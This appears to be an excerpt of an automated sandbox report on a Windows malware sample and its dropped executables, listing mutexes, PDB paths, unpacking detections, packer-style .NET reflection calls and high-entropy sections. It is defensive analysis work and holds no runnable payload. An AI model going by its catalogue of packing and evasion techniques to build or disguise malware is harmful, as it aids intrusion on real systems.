                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4652:120:WilError_01
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: 0.0
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: hijaduvinijebup
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: mocisacatenu
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: wapejan
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: wovag
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: cbH
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: Piruvora
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: gukafipa
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: mawecamaxe
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: Hiwejanoji
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: Pusazide
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Command line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Command line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Command line argument: cbH
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Command line argument: cbH
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Command line argument: cbH
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: A4DE.exe.5.dr, Univesity_Grade_Calculator/Form1.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: ECD2MpEBSf.exe | Static PE information: More than 200 imports for KERNEL32.dll
                      Source: ECD2MpEBSf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: ECD2MpEBSf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: ECD2MpEBSf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: ECD2MpEBSf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: ECD2MpEBSf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: ECD2MpEBSf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: ECD2MpEBSf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: BB8A.exe, 0000000C.00000000.759454697.0000000000413000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.765793505.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000010.00000002.807243826.0000000004DE0000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: r*;\C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdbh source: CCB2.exe, 0000000F.00000000.768135951.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777349843.00000000049D7000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: C:\nobaniz_sakalacato34.pdbh source: ECD2MpEBSf.exe, 00000000.00000002.667356464.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000000.00000000.661810290.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000001.00000000.664620927.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000000.751866281.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000002.758107473.0000000000401000.00000020.00020000.sdmp, jgdhbua, 0000000B.00000000.755033215.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: ;C:\bajudag\zexi\yedu49\hecicu\2-tiwi\cabilok\fes.pdbh source: D936.exe, 00000011.00000000.776580962.0000000000401000.00000020.00020000.sdmp, krmdinzg.exe, 00000020.00000000.795753078.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.778942214.0000000000B3E000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777377914.0000000000B3E000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdb source: CCB2.exe, 0000000F.00000000.768135951.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: BB8A.exe, 0000000C.00000000.759454697.0000000000413000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.765793505.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000010.00000002.807243826.0000000004DE0000.00000002.00020000.sdmp
                      Source: Binary string: C:\bajudag\zexi\yedu49\hecicu\2-tiwi\cabilok\fes.pdb source: D936.exe, 00000011.00000000.776580962.0000000000401000.00000020.00020000.sdmp, krmdinzg.exe, 00000020.00000000.795753078.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\nobaniz_sakalacato34.pdb source: ECD2MpEBSf.exe, ECD2MpEBSf.exe, 00000000.00000002.667356464.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000000.00000000.661810290.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000001.00000000.664620927.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000000.751866281.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000002.758107473.0000000000401000.00000020.00020000.sdmp, jgdhbua, 0000000B.00000000.755033215.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.778942214.0000000000B3E000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777377914.0000000000B3E000.00000004.00000001.sdmp

                      Data Obfuscation:

                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Unpacked PE file: 15.2.CCB2.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Unpacked PE file: 17.2.D936.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Unpacked PE file: 32.2.krmdinzg.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Unpacked PE file: 15.2.CCB2.exe.400000.0.unpack .text:ER;.data:W;.zic:W;.wuvuhus:W;.jufot:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Unpacked PE file: 17.2.D936.exe.400000.0.unpack .text:ER;.data:W;.lih:W;.cazelob:W;.pox:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Unpacked PE file: 32.2.krmdinzg.exe.400000.0.unpack .text:ER;.data:W;.lih:W;.cazelob:W;.pox:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains potential unpacker
                      Source: A4DE.exe.5.dr, Univesity_Grade_Calculator/Form1.cs | .Net Code: Form1_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: D502.exe.5.dr, CoreApi.cs | .Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 37.0.3D34.exe.150000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 37.2.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 37.0.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 37.0.3D34.exe.150000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_00573634 push es; iretd
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 9_2_006F3634 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | Code function: 12_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | Code function: 12_2_0069127E push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | Code function: 12_2_0069123C push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | Code function: 12_2_0069735E push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | Code function: 12_2_006953C8 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_0041A63D push eax; retf 007Fh
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_0041A6C4 push E0007FC6h; retf 007Fh
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_0041A310 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_0041A7DC pushad ; iretd
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00693C00 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_0043DA48 push es; retf 0041h
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Code function: 18_2_00EC8508 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Code function: 18_2_00EC764A push esp; ret
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Code function: 18_2_017B4003 push esi; retf
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Code function: 18_2_0581C502 push E80B905Eh; ret
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Code function: 18_2_0581D4EB push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Code function: 18_2_0581CF38 pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Code function: 18_2_0581CF78 pushfd ; retf
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Code function: 32_2_0043DA48 push es; retf 0041h
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_0042D770 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: 6C37.exe.5.dr | Static PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                      Source: ECD2MpEBSf.exe | Static PE information: section name: .kipex
                      Source: ECD2MpEBSf.exe | Static PE information: section name: .him
                      Source: ECD2MpEBSf.exe | Static PE information: section name: .hakir
                      Source: E3A9.exe.5.dr | Static PE information: section name:
                      Source: E3A9.exe.5.dr | Static PE information: section name:
                      Source: E3A9.exe.5.dr | Static PE information: section name:
                      Source: E3A9.exe.5.dr | Static PE information: section name:
                      Source: E3A9.exe.5.dr | Static PE information: section name:
                      Source: E3A9.exe.5.dr | Static PE information: section name:
                      Source: E3A9.exe.5.dr | Static PE information: section name: .28gybOo
                      Source: E3A9.exe.5.dr | Static PE information: section name: .adata
                      Source: CCB2.exe.5.dr | Static PE information: section name: .zic
                      Source: CCB2.exe.5.dr | Static PE information: section name: .wuvuhus
                      Source: CCB2.exe.5.dr | Static PE information: section name: .jufot
                      Source: 6C37.exe.5.dr | Static PE information: section name: .didata
                      Source: 888A.exe.5.dr | Static PE information: section name: _RDATA
                      Source: D936.exe.5.dr | Static PE information: section name: .lih
                      Source: D936.exe.5.dr | Static PE information: section name: .cazelob
                      Source: D936.exe.5.dr | Static PE information: section name: .pox
                      Source: 9889.exe.5.dr | Static PE information: section name:
                      Source: 9889.exe.5.dr | Static PE information: section name:
                      Source: 9889.exe.5.dr | Static PE information: section name:
                      Source: 9889.exe.5.dr | Static PE information: section name:
                      Source: 9889.exe.5.dr | Static PE information: section name:
                      Source: 9889.exe.5.dr | Static PE information: section name:
                      Source: 9889.exe.5.dr | Static PE information: section name: .kujN2o2
                      Source: 9889.exe.5.dr | Static PE information: section name: .adata
                      Source: CADF.exe.5.dr | Static PE information: section name: _RDATA
                      Source: jgdhbua.5.dr | Static PE information: section name: .kipex
                      Source: jgdhbua.5.dr | Static PE information: section name: .him
                      Source: jgdhbua.5.dr | Static PE information: section name: .hakir
                      Source: krmdinzg.exe.17.dr | Static PE information: section name: .lih
                      Source: krmdinzg.exe.17.dr | Static PE information: section name: .cazelob
                      Source: krmdinzg.exe.17.dr | Static PE information: section name: .pox
                      Source: initial sample | Static PE information: section where entry point is pointing to: .didata
                      Source: E3A9.exe.5.dr | Static PE information: real checksum: 0x3721bb should be: 0x373654
                      Source: 9889.exe.5.dr | Static PE information: real checksum: 0x373823 should be: 0x3738f9
                      Source: D502.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x1298c
                      Source: 3D34.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x9011f
                      Source: initial sample | Static PE information: section name: .text entropy: 6.96486152385
                      Source: initial sample | Static PE information: section name: entropy: 7.99714766582
                      Source: initial sample | Static PE information: section name: entropy: 7.90784224501
                      Source: initial sample | Static PE information: section name: entropy: 7.99361781473
                      Source: initial sample | Static PE information: section name: entropy: 7.80912989946
                      Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22348700263
                      Source: initial sample | Static PE information: section name: .28gybOo entropy: 7.91849564721
                      Source: initial sample | Static PE information: section name: .text entropy: 6.98113997622
                      Source: initial sample | Static PE information: section name: .didata entropy: 7.99713235918
                      Source: initial sample | Static PE information: section name: .text entropy: 6.95944979331
                      Source: initial sample | Static PE information: section name: entropy: 7.99715248044
                      Source: initial sample | Static PE information: section name: entropy: 7.90789134233
                      Source: initial sample | Static PE information: section name: entropy: 7.99431797903
                      Source: initial sample | Static PE information: section name: entropy: 7.81839424264
                      Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22755578232
                      Source: initial sample | Static PE information: section name: .kujN2o2 entropy: 7.91856580958
                      Source: initial sample | Static PE information: section name: .text entropy: 6.96486152385
                      Source: initial sample | Static PE information: section name: .text entropy: 6.95944979331
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 3D34.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.3D34.exe.ec0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.3D34.exe.ec0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.2.3D34.exe.ec0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.0.3D34.exe.ec0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.3D34.exe.ec0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.3D34.exe.ec0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 37.0.3D34.exe.150000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 37.0.3D34.exe.150000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 37.2.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
